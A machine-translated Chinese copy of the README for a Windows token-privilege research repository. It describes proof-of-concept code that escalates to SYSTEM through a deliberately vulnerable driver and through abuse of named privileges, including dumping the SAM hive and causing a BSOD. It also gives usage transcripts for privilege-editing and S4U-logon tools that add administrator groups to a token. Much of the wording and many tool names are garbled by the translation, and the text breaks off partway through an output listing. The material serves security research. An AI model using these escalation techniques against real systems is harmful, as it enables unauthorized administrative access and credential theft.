首頁>編程相關>其他源碼
下載

preffu

內核模式WINDBG擴展和用於測試令牌特權如何工作的POC。

有著名的存儲庫和有關令牌特權濫用這種Grzegorz Tworek的Priv2Admin的文章。該存儲庫中的代碼旨在幫助調查令牌特權的工作方式。

目錄

  • preffu
    • ArtsofgetSystem
    • kernelwritepocs
    • privedor
      • getps命令
      • getPriv命令
      • addpriv命令
      • rmpriv命令
      • 啟用命令
      • disablepriv命令
      • enableall命令
      • disableall命令
    • 特權操作
    • s4udelegator
    • switchpriv
    • Tokendump
    • Tokenassignor
    • TrustExec
    • Userrightsutil
    • 參考
    • 致謝

ArtsofgetSystem

回到頂部

專案

該項目涵蓋瞭如何從高完整性級別外殼中獲得系統特權。有關詳細信息,請參見readme.md。

kernelwritepocs

回到頂部

專案

該項目的目的是調查攻擊者如何濫用任意內核寫入脆弱性。所有POC均為Hacksys Extreme脆弱驅動器編寫。這些POC中的大多數通過濫用任意內核寫入漏洞和令牌特權來獲得系統完整性水平。在Windows 10版本1809/1903上進行了測試,但理論上應該在Windows 10中使用:

POC名稱描述
CreateSeassignTokenVariant該POC使用SeCreateTokenPrivilegeSeAssignPrimaryTokenPrivilege進行EOP。
CreateImpersonateTokenVariant該POC與SeCreateTokenPrivilegeSeImpersonatePrivilege一起執行EOP。
CreateTokenVariant該POC與SeCreateTokenPrivilege一起執行EOP。
debugindoxtvariant該POC與SeDebugPrivilege一起執行EOP。在最後階段使用代碼注入winlogon.exe。
debugupdateProcrcriciant該POC與SeDebugPrivilege一起執行EOP。在最後階段,使用UpdateProcThreadAttribute API從Winlogon.exe創建系統過程。
恢復過度化鑑定該POC用SeRestorePrivilege執行EOP。與此POC一起使用hijackshelllib。
次級變量該POC與SeCreateTokenPrivilegeSeImpersonatePrivilege一起執行EOP。在最後階段使用輔助登錄服務。
佔用權力服務員variant該POC使用SeTakeOwnershipPrivilege執行EOP。與此POC一起使用hijackshelllib。
tcbs4uassigntokenvariant該POC使用SeTcbPrivilege執行EOP。從中等強制性級別獲取系統強制級別的外殼。
tcbs4uimpersonationvariant該POC使用SeTcbPrivilege執行EOP。用S4U登錄執行線程模擬。沒有高或系統完整性水平。

privedor

回到頂部

專案

警告

在某些環境中,調試構建行不通。釋放構建是首選。

PRIVEDITOR是內核模式WINDBG擴展,以操縱特定過程的令牌特權。此擴展名使您可以輕鬆地配置要調查的令牌特權: 

 0: kd> .load C:devPrivEditorx64ReleasePrivEditor.dll

PrivEditor - Kernel Mode WinDbg extension for token privilege edit.

Commands :
    + !getps       : List processes in target system.
    + !getpriv     : List privileges of a process.
    + !addpriv     : Add privilege(s) to a process.
    + !rmpriv      : Remove privilege(s) from a process.
    + !enablepriv  : Enable privilege(s) of a process.
    + !disablepriv : Disable privilege(s) of a process.
    + !enableall   : Enable all privileges available to a process.
    + !disableall  : Disable all privileges available to a process.

[*] To see command help, execute "!<Command> help" or "!<Command> /?".

getps命令

此命令是在您的目標系統中列出進程: 

 0: kd> !getps /?

!getps - List processes in target system.

Usage : !getps [Process Name]

    Process Name : (OPTIONAL) Specifies filter string for process name.

如果您在沒有任何參數的情況下執行此命令,則此命令列表目標系統中的所有進程如下: 

 0: kd> !getps

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
       0 0xfffff805`81233630      0x00000000`00000000 Idle
       4 0xffffd60f`ec068380      0xffffaf00`cec07a40 System
      68 0xffffd60f`f1780480      0xffffaf00`d3b290a0 svchost.exe
      88 0xffffd60f`ec0db080      0xffffaf00`cec0d080 Registry
     324 0xffffd60f`ef342040      0xffffaf00`d0416080 smss.exe
     348 0xffffd60f`f052f100      0xffffaf00`d25d30a0 dwm.exe
     408 0xffffd60f`eca8e140      0xffffaf00`d21bd930 csrss.exe
     480 0xffffd60f`f05a8340      0xffffaf00`d2568670 svchost.exe
     484 0xffffd60f`efcd60c0      0xffffaf00`d06430e0 wininit.exe
     500 0xffffd60f`efd130c0      0xffffaf00`d23100a0 csrss.exe
     580 0xffffd60f`efdc0080      0xffffaf00`d2266630 winlogon.exe

--snip--

如果您想知道特定的過程,請按以下方式設置字符串過濾器。該過濾器可與前匹配和病例不敏感: 

 0: kd> !getps micro

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
    4568 0xffffd60f`f14ed080      0xffffaf00`d3db60a0 MicrosoftEdge.exe
    4884 0xffffd60f`f1647080      0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
    4892 0xffffd60f`f1685080      0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe

getPriv命令

此命令是列出特定過程的令牌特權: 

 0: kd> !getpriv /?

!getpriv - List privileges of a process.

Usage : !getpriv <PID>

    PID : Specifies target process ID.

要使用此命令,您需要以十進制格式設置目標進程ID如下: 

 0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

addpriv命令

此命令是將令牌特權添加到特定過程: 

 0: kd> !addpriv /?

!addpriv - Add privilege(s) to a process.

Usage : !addpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.
        + IncreaseQuota                  : SeIncreaseQuotaPrivilege.
        + MachineAccount                 : SeMachineAccountPrivilege.
        + Tcb                            : SeTcbPrivilege.
        + Security                       : SeSecurityPrivilege.
        + TakeOwnership                  : SeTakeOwnershipPrivilege.
        + LoadDriver                     : SeLoadDriverPrivilege.
        + SystemProfile                  : SeSystemProfilePrivilege.
        + Systemtime                     : SeSystemtimePrivilege.
        + ProfileSingleProcess           : SeProfileSingleProcessPrivilege.
        + IncreaseBasePriority           : SeIncreaseBasePriorityPrivilege.
        + CreatePagefile                 : SeCreatePagefilePrivilege.
        + CreatePermanent                : SeCreatePermanentPrivilege.
        + Backup                         : SeBackupPrivilege.
        + Restore                        : SeRestorePrivilege.
        + Shutdown                       : SeShutdownPrivilege.
        + Debug                          : SeDebugPrivilege.
        + Audit                          : SeAuditPrivilege.
        + SystemEnvironment              : SeSystemEnvironmentPrivilege.
        + ChangeNotify                   : SeChangeNotifyPrivilege.
        + RemoteShutdown                 : SeRemoteShutdownPrivilege.
        + Undock                         : SeUndockPrivilege.
        + SyncAgent                      : SeSyncAgentPrivilege.
        + EnableDelegation               : SeEnableDelegationPrivilege.
        + ManageVolume                   : SeManageVolumePrivilege.
        + Impersonate                    : SeImpersonatePrivilege.
        + CreateGlobal                   : SeCreateGlobalPrivilege.
        + TrustedCredManAccess           : SeTrustedCredManAccessPrivilege.
        + Relabel                        : SeRelabelPrivilege.
        + IncreaseWorkingSet             : SeIncreaseWorkingSetPrivilege.
        + TimeZone                       : SeTimeZonePrivilege.
        + CreateSymbolicLink             : SeCreateSymbolicLinkPrivilege.
        + DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
        + All                            : All privileges.

例如,如果要將sedebugprivilege設置為特定過程,請為第一個參數設置目標過程ID,並縮短privilege名稱debug如第二個參數的幫助消息中列出的,如下所示: 

 0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

0: kd> !addpriv 5704 debug

[>] Trying to add SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

特權名稱參數是案例不敏感的。

如果您想一次添加所有令牌特權,請將all設置為特權名稱參數: 

 0: kd> !addpriv 5704 all

[>] Trying to add all privileges.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeCreateTokenPrivilege                     Disabled
SeAssignPrimaryTokenPrivilege              Disabled
SeLockMemoryPrivilege                      Disabled
SeIncreaseQuotaPrivilege                   Disabled
SeMachineAccountPrivilege                  Disabled
SeTcbPrivilege                             Disabled
SeSecurityPrivilege                        Disabled

--snip--

rmpriv命令

此命令是從特定過程中刪除令牌特權: 

 0: kd> !rmpriv /?

!rmpriv - Remove privilege(s) from a process.

Usage : !rmpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

如果要刪除sechangenotifyprivilege,請執行此命令如下: 

 0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

0: kd> !rmpriv 352 changenotify

[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

AS !addpriv命令,您可以一次將所有特權名稱參數設置為all特權: 

 0: kd> !rmpriv 352 all

[>] Trying to remove all privileges.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

啟用命令

此命令是啟用特定過程的令牌特權: 

 0: kd> !enablepriv /?

!enablepriv - Enable privilege(s) of a process.

Usage : !enablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

第一個論點是流程ID,第二個論點是為代幣特權名稱: 

 0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 timezone

[>] Trying to enable SeTimeZonePrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

如果您嘗試啟用特權,尚未添加,則此命令會自動添加它: 

 0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 debug

[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

disablepriv命令

此命令是禁用特定過程的令牌特權: 

 0: kd> !disablepriv /?

!disablepriv - Disable privilege(s) of a process.

Usage : !disablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--

要使用此命令,請為第一個參數設置目標進程ID,並為第二個參數設置令牌特權名稱: 

 0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !disablepriv 1932 debug

[>] Trying to disable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

enableall命令

此命令將啟用用於特定過程的所有令牌特權: 

 0: kd> !enableall /?

!enableall - Enable all privileges available to a process.

Usage : !enableall <PID>

    PID       : Specifies target process ID.

它的工作如下: 

 0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !enableall 3792

[>] Trying to enable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

disableall命令

此命令是為特定過程禁用所有令牌特權: 

 0: kd> !disableall /?

!disableall - Disable all privileges available to a process.

Usage : !disableall <PID>

    PID : Specifies target process ID.

此命令等同於!disablepriv <PID> all 。工作如下: 

 0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !disableall 3792

[>] Trying to disable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

特權操作

回到頂部

專案

該項目是敏感令牌SeDebugPrivilege的POC。目前,為其中一部分發布了POC。

程序名稱描述
seauditprivilegepoc該POC試圖創建SeAuditPrivilegePoC的新安全事件。 SeAuditPrivilege不需要高的完整性水平,但是此POC需要在第一個執行時進行管理特權才能安裝新事件源。此外,為了確認結果,此POC可能需要修改本地安全策略設置。
Sebackupprivilegepoc該POC試圖丟棄SeBackupPrivilegeHKLMSAM
SecreatePageFilePilegileGePoc該POC試圖通過SeCreatePagefilePrivilege將PageFile選項設置為特定值。
SecreateTokenPrivileGepoc該POC試圖通過SeCreateTokenPrivilege創建一個高架令牌。
Sedebugprivilegepoc該POC試圖打開SeDebugPrivilege的Winlogon.exe的手柄。
SerestorePrivileGepoc此POC試圖通過SeRestorePrivilegeC:WindowsSystem32中編寫測試文件。
Sesecurityprivilegepoc該POC試圖閱讀SeSecurityPrivilege的最新安全事件。
seshutdownprivilegepoc該POC試圖通過SeShutdownPrivilege引起BSOD。
SesystemenvironmentPrivileGepoc該POC試圖通過SeSystemEnvironmentPrivilege枚舉系統環境。僅適用於基於UEFI的系統。由於OS功能,此POC對OSS不起作用的Windows 10 Build 1809。
setakeownershipprivilegepoc此POC試圖將HKLM:SYSTEMCurrentControlSetServicesdmwappushservice by SeTakeOwnershipPrivilege
setcbprivilegepoc該POC試圖通過SeTcbPrivilege執行S4U登錄以BuiltinBackup Operators符。
setRustedCredManAccessPrivileGepoc該POC試圖通過SeTrustedCredManAccessPrivilege訪問DPAPI BLOB。

s4udelegator

回到頂部

專案

該工具是用SETCBPRIVILEGE執行S4U登錄。要使用此工具執行S4U登錄,需要管理特權。 

 PS C:Tools> .S4uDelegator.exe -h

S4uDelegator - Tool for S4U Logon.

Usage: S4uDelegator.exe [Options]

        -h, --help    : Displays this help message.
        -l, --lookup  : Flag to lookup account SID.
        -x, --execute : Flag to execute command.
        -c, --command : Specifies command to execute. Default is cmd.exe.
        -d, --domain  : Specifies domain name to lookup or S4U logon.
        -e, --extra   : Specifies group SIDs you want to add for S4U logon with comma separation.
        -n, --name    : Specifies account name to lookup or S4U logon.
        -s, --sid     : Specifies SID to lookup.

要使用此工具,必須指定-l-x標誌。 -l標誌用於查找帳戶信息如下: 

 PS C:Tools> .S4uDelegator.exe -l -d contoso -n "domain admins"

[*] Account Name : CONTOSODomain Admins
[*] SID          : S-1-5-21-3654360273-254804765-2004310818-512
[*] Account Type : Group

PS C:Tools> .S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736

[*] Account Name : NT SERVICEWinDefend
[*] SID          : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup

要使用S4U登錄執行命令,請設置-x標誌,並指定帳戶名稱或SID如下。可以使用-c選項指定執行的命令(默認為cmd.exe ): 

 PS C:Tools> whoami /user

USER INFORMATION
----------------

User Name    SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> .S4uDelegator.exe -x -d . -n admin

[*] S4U logon target information:
    [*] Account : CL01admin
    [*] SID     : S-1-5-21-2659926013-4203293582-4033841475-500
    [*] UPN     : (Null)
    [*] Type    : User
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.

C:Tools>whoami /user

USER INFORMATION
----------------

User Name  SID
========== =============================================
cl01admin S-1-5-21-2659926013-4203293582-4033841475-500

如果要添加額外的組信息,請設置具有逗號分離值的組SID,並使用-e選項,如下: 

 PS C:Tools> whoami /user

USER INFORMATION
----------------

User Name     SID
============= =============================================
contosodavid S-1-5-21-3654360273-254804765-2004310818-1104
PS C:Tools> .S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell

[*] S4U logon target information:
    [*] Account : CONTOSOjeff
    [*] SID     : S-1-5-21-3654360273-254804765-2004310818-1105
    [*] UPN     : [email protected]
    [*] Type    : User
[>] Verifying extra group SID(s).
[*] BUILTINAdministrators (SID : S-1-5-32-544) will be added as a group.
[*] NT AUTHORITYNETWORK SERVICE (SID : S-1-5-20) will be added as a group.
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:Tools> whoami /user

USER INFORMATION
----------------

User Name    SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> whoami /groups                                                                                             
GROUP INFORMATION
-----------------

Group Name                             Type             SID                                           Attributes        
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTINUsers                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK                   Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators                 Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK SERVICE           Well-known group S-1-5-20                                      Mandatory group, Enabled by default, Enabled group
CONTOSOServerAdmins                   Group            S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group
Service asserted identity              Well-known group S-1-18-2                                      Mandatory group, Enabled by default, Enabled group
Mandatory LabelSystem Mandatory Level Label            S-1-16-16384

警告

如果您嘗試使用無私人帳戶的S4U登錄,則將獲得錯誤0xC0000142STATUS_DLL_INIT_FAILED ),並且無法執行命令。為避免此問題,請將特權組添加為具有-e選項的額外組。

另外,某些帳戶不能指定為S4U登錄的額外組(例如NT SERVICETrustedInstaller )。如果將此類組帳戶設置為額外組,則S4U登錄將失敗,而ERROR_ACCESS_DENIED 0x00000005 ( error_access_denied )

switchpriv

回到頂部

專案

該工具是為一個過程啟用或禁用特定令牌特權: 

 PS C:Dev> .SwitchPriv.exe -h

SwitchPriv - Tool to control token privileges.

Usage: SwitchPriv.exe [Options]

        -h, --help      : Displays this help message.
        -d, --disable   : Specifies token privilege to disable or "all".
        -e, --enable    : Specifies token privilege to enable or "all".
        -f, --filter    : Specifies token privilege you want to remain.
        -i, --integrity : Specifies integrity level to set in decimal value.
        -p, --pid       : Specifies the target PID. Default specifies PPID.
        -r, --remove    : Specifies token privilege to remove or "all".
        -s, --search    : Specifies token privilege to search.
        -g, --get       : Flag to get available privileges for the target process.
        -l, --list      : Flag to list values for --integrity options.
        -S, --system    : Flag to run as "NT AUTHORITYSYSTEM".

要列出--integrity選項的值,請使用--list標誌執行如下: 

 PS C:Dev> .SwitchPriv.exe -l

Available values for --integrity option:

    * 0 : UNTRUSTED_MANDATORY_LEVEL
    * 1 : LOW_MANDATORY_LEVEL
    * 2 : MEDIUM_MANDATORY_LEVEL
    * 3 : MEDIUM_PLUS_MANDATORY_LEVEL
    * 4 : HIGH_MANDATORY_LEVEL
    * 5 : SYSTEM_MANDATORY_LEVEL
    * 6 : PROTECTED_MANDATORY_LEVEL
    * 7 : SECURE_MANDATORY_LEVEL

Example :

    * Down a specific process' integrity level to Low.

        PS C:> .SwitchPriv.exe -p 4142 -s 1

Protected and Secure level should not be available, but left for research purpose.

使用-p選項指定目標過程的PID。您可以使用-g標誌和-p選項列出目標過程的可用特權:如下: 

 PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

當未指定-p選項時,PID將是此工具的父pid: 

 PS C:Dev> .SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 6772
    [*] Process Name : powershell
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

指定要控制的特權名稱,任何情況不敏感的字符串都可以指定目標過程中可用特權的唯一特權名稱。例如,要啟用SeUndockPrivilege的目標過程,請執行--enable選項,如下所示: 

 PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 9408 -e und

[>] Trying to enable a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

當您設置無法指定唯一特權名稱的偽造字符串時,您將獲得以下消息: 

 PS C:Dev> .SwitchPriv.exe -p 9408 -e se

[>] Trying to enable a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[-] Cannot specify a unique privilege to enable.
    [*] SeShutdownPrivilege
    [*] SeChangeNotifyPrivilege
    [*] SeUndockPrivilege
    [*] SeIncreaseWorkingSetPrivilege
    [*] SeTimeZonePrivilege
[*] Done.

例如,要啟用sechangenotifyprivilege,請執行--disable選項如下: 

 PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 9408 -d chan

[>] Trying to disable a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.

PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= ==========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Disabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

要刪除特權,請使用--remove選項,如下: 

 PS C:Dev> .SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= ==========================
